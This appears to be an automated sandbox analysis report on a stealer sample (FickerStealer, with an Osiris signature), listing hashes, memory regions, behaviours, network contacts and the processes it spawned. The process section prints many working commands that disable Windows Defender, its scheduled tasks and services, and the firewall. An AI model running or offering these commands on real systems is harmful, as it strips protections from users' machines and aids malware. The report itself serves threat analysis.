C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/588-108-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/588-111-0x000000001A950000-0x000000001A952000-memory.dmp
memory/588-112-0x000000001A954000-0x000000001A956000-memory.dmp
memory/1540-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1540-119-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1540-123-0x0000000002510000-0x0000000002512000-memory.dmp
memory/1540-124-0x0000000002514000-0x0000000002516000-memory.dmp
memory/1148-126-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1148-129-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1148-132-0x000000001AC30000-0x000000001AC32000-memory.dmp
memory/1148-133-0x000000001AC34000-0x000000001AC36000-memory.dmp
memory/1780-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1780-139-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1780-142-0x000000001AD00000-0x000000001AD02000-memory.dmp
memory/1780-144-0x000000001AD04000-0x000000001AD06000-memory.dmp
memory/1992-146-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1992-149-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1992-151-0x000000001AE50000-0x000000001AE51000-memory.dmp
memory/1992-152-0x000000001ADD0000-0x000000001ADD2000-memory.dmp
memory/1992-153-0x000000001ADD4000-0x000000001ADD6000-memory.dmp
memory/1992-154-0x0000000002540000-0x0000000002541000-memory.dmp
memory/1992-155-0x00000000024A0000-0x00000000024A1000-memory.dmp
memory/1880-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1880-159-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1880-163-0x000000001AD90000-0x000000001AD92000-memory.dmp
memory/1880-164-0x000000001AD94000-0x000000001AD96000-memory.dmp
memory/1880-165-0x00000000024D0000-0x00000000024D1000-memory.dmp
memory/1608-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1608-170-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1608-173-0x000000001ABB0000-0x000000001ABB2000-memory.dmp
memory/1608-174-0x000000001ABB4000-0x000000001ABB6000-memory.dmp
memory/1476-177-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1476-180-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1476-184-0x000000001AC60000-0x000000001AC62000-memory.dmp
memory/1476-185-0x000000001AC64000-0x000000001AC66000-memory.dmp
memory/1248-187-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1248-190-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1248-193-0x000000001AAF0000-0x000000001AAF2000-memory.dmp
memory/1248-194-0x000000001AAF4000-0x000000001AAF6000-memory.dmp
memory/1340-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1340-200-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1340-201-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1340-202-0x000000001ABC0000-0x000000001ABC1000-memory.dmp
memory/1340-204-0x000000001AB40000-0x000000001AB42000-memory.dmp
memory/1340-205-0x000000001AB44000-0x000000001AB46000-memory.dmp
memory/1824-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1824-210-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1824-213-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1824-214-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
memory/1824-215-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
memory/1824-216-0x0000000002370000-0x0000000002371000-memory.dmp
memory/888-217-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/888-220-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/888-223-0x000000001AC00000-0x000000001AC02000-memory.dmp
memory/888-224-0x000000001AC04000-0x000000001AC06000-memory.dmp
memory/1724-227-0x0000000000000000-mapping.dmp
memory/1216-228-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1216-231-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1216-234-0x000000001AD30000-0x000000001AD32000-memory.dmp
memory/1216-235-0x000000001AD34000-0x000000001AD36000-memory.dmp
memory/1240-238-0x0000000000000000-mapping.dmp
memory/2024-239-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/2024-242-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/2024-245-0x000000001AC60000-0x000000001AC62000-memory.dmp
memory/2024-246-0x000000001AC64000-0x000000001AC66000-memory.dmp
memory/1656-249-0x0000000000000000-mapping.dmp
memory/1340-251-0x0000000000000000-mapping.dmp
memory/672-252-0x0000000000000000-mapping.dmp
memory/108-253-0x0000000000000000-mapping.dmp
memory/1636-254-0x0000000000000000-mapping.dmp
memory/932-255-0x0000000000000000-mapping.dmp
memory/1120-256-0x0000000000000000-mapping.dmp
memory/344-257-0x0000000000000000-mapping.dmp
memory/1824-258-0x0000000000000000-mapping.dmp
memory/1376-259-0x0000000000000000-mapping.dmp
memory/820-260-0x0000000000000000-mapping.dmp
memory/668-261-0x0000000000000000-mapping.dmp
memory/1072-262-0x0000000000000000-mapping.dmp
memory/976-263-0x0000000000000000-mapping.dmp
memory/788-264-0x0000000000000000-mapping.dmp
memory/552-265-0x0000000000000000-mapping.dmp
memory/888-266-0x0000000000000000-mapping.dmp
memory/368-267-0x0000000000000000-mapping.dmp
memory/748-268-0x0000000000000000-mapping.dmp
memory/1604-269-0x0000000000000000-mapping.dmp
memory/1976-270-0x0000000000000000-mapping.dmp
memory/2040-271-0x0000000000000000-mapping.dmp
memory/2044-272-0x0000000000000000-mapping.dmp
memory/1292-273-0x0000000000000000-mapping.dmp
memory/1828-274-0x0000000000000000-mapping.dmp
memory/1704-275-0x0000000000000000-mapping.dmp
memory/2016-276-0x0000000000000000-mapping.dmp
memory/1944-277-0x0000000000000000-mapping.dmp
memory/1696-278-0x0000000000000000-mapping.dmp
memory/736-279-0x0000000000000000-mapping.dmp
memory/2036-280-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-01-28 10:48
Reported
2021-01-28 10:50
Platform
win10v20201028
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Osiris
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107723.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
JavaScript code in executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Uses Tor communications
Enumerates physical storage devices
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3992 set thread context of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BD8.tmp\2BD9.tmp\2BDA.bat C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.243.164.148:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | mobilesuit.top | udp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 193.23.244.244:80 | tcp | |
| N/A | 194.109.206.212:80 | tcp | |
| N/A | 204.13.164.118:80 | 204.13.164.118 | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.189.250:443 | api.ipify.org | tcp |
| N/A | 171.25.193.9:443 | 171.25.193.9 | tcp |
| N/A | 171.25.193.9:443 | 171.25.193.9 | tcp |
| N/A | 154.35.175.225:80 | tcp | |
| N/A | 193.23.244.244:80 | tcp | |
| N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp |
| N/A | 193.218.118.62:80 | 193.218.118.62 | tcp |
| N/A | 178.254.45.64:443 | tcp | |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 139.99.98.191:80 | 139.99.98.191 | tcp |
| N/A | 148.251.192.160:443 | 148.251.192.160 | tcp |
| N/A | 107.189.10.237:80 | 107.189.10.237 | tcp |
| N/A | 195.135.194.134:80 | 195.135.194.134 | tcp |
| N/A | 178.17.170.77:80 | 178.17.170.77 | tcp |
| N/A | 38.145.200.67:443 | tcp | |
| N/A | 46.38.51.18:80 | 46.38.51.18 | tcp |
| N/A | 212.21.66.6:80 | 212.21.66.6 | tcp |
| N/A | 127.0.0.1:32767 | tcp |
Files
memory/3992-2-0x0000000003300000-0x0000000003301000-memory.dmp
memory/1928-3-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1928-4-0x0000000000401480-mapping.dmp
memory/1928-6-0x0000000000400000-0x0000000000448000-memory.dmp
memory/3992-5-0x00000000031D0000-0x0000000003215000-memory.dmp
memory/3948-7-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
memory/2224-10-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/3948-13-0x00000000033B0000-0x00000000033B1000-memory.dmp
memory/3948-14-0x00000000033B0000-0x00000000033C7000-memory.dmp
memory/2224-15-0x0000000001020000-0x000000000109B000-memory.dmp
memory/3948-16-0x00000000019F0000-0x0000000001A08000-memory.dmp
memory/3948-17-0x0000000000400000-0x000000000041B000-memory.dmp
